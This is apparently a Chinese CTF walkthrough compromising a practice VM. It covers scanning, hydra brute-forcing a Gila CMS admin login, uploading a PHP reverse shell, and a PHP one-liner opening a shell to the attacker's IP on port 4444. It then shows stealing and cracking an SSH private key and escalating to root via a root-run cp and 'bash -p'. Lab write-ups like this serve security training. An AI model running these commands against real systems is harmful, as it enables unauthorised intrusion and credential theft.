环境准备
靶机链接:百度网盘 请输入提取码
提取码:zdpr
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.arp-scan -l探测目标靶机ip
2.nmap -p- -A -T4 192.168.1.107
探测目标靶机开放端口和服务
3.gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50
用gobuster扫描目录,啥也没有
漏洞探测
1.登录ftp,将note.txt下载下来
2.得到俩个名字kevin Aaron 和一个域名
3.把域名添加到/etc/hosts
4.wfuzz -H 'HOST: FUZZ.ceng-company.vm' -u 'http://ceng-company.vm/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 53,76
用wfuzz进行子域名探索 --hw是不搜集53,76 扫出的admin添加到/etc/hosts
5.gobuster dir -u http://admin.ceng-company.vm \ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
扫描子域目录,发现gila
6.gobuster dir -u http://admin.ceng-company.vm/gila -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
扫描查出gila下的目录
7.尝试sql注入失败,用暴力破解,根据note.txt文件大概知道用户名是邮箱格式
8.hydra -l kevin@ceng-company.vm -P /usr/share/wordlists/rockyou.txt admin.ceng-company.vm http-post-form '/gila/admin/:username=kevin@ceng-company.vm&password=^PASS^:Wrong email or password' -vV -f
9.很尴尬我破解出来的密码居然是love4eva ,因为这个过程很漫长,我开启天眼模式已经知道密码admin,并登录进去。
我做完靶机之后再访问网页的时候用love4eva登录一下,神奇的事情发生了,网页居然找不到了,还报错!!可能这个用户有俩密码把。
漏洞利用
1.把index.php页面改成php-reverse-shell.php(自行谷歌可以找到)的内容
2.点击报错,成功反弹shell,看到swartz有些权限
3.看了看好像啥也没有,自己存侥幸心理sudo -l 一下,他还真有!
(swartz) NOPASSWD: /home/swartz/runphp.sh
4.他可以不需要密码就可以执行这个文件
sudo -u swartz /home/swartz/runphp.sh
发现进入了一个php命令里,那就直接反弹shell把!(自行谷歌php reverse shell)
php -r '$sock=fsockopen("192.168.1.106",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
权限提升
1.进入之后,进入mitnick,发现.ssh文件夹,存放公私钥的地方!
2.python3 -m http.server
wget http://192.168.1.107:8000/id_rsa
开放8000端口,下载下来私钥,进行ssh登录
3.john --wordlist=/usr/share/wordlists/rockyou.txt hash
发现登录的时候要密码,那用john破解下得到密码 legend
4.ssh mitnick@192.168.1.107 -i id_rsa
再次登录还报错,给私钥400权限就行了
5.查看以suid权限执行命令的文件,没有可以利用的
find / -perm -u=s -type f 2>/dev/null
我看好多博主用的find / -type f -perm -g+rwx 2>/dev/null 这个命令,也是可以的 查找用户组下rwx权限
6.上传pspy64检查程序,发现一个以root权限执行的命令cp
7.分别查看这俩个文件
8.这个权限挺高,满权限
9.把提权命令写进去
10.写入后查看,退出去,重新登录
11./bin/bash -p 成功提权
成功拿到root.txt,成功拿下!!!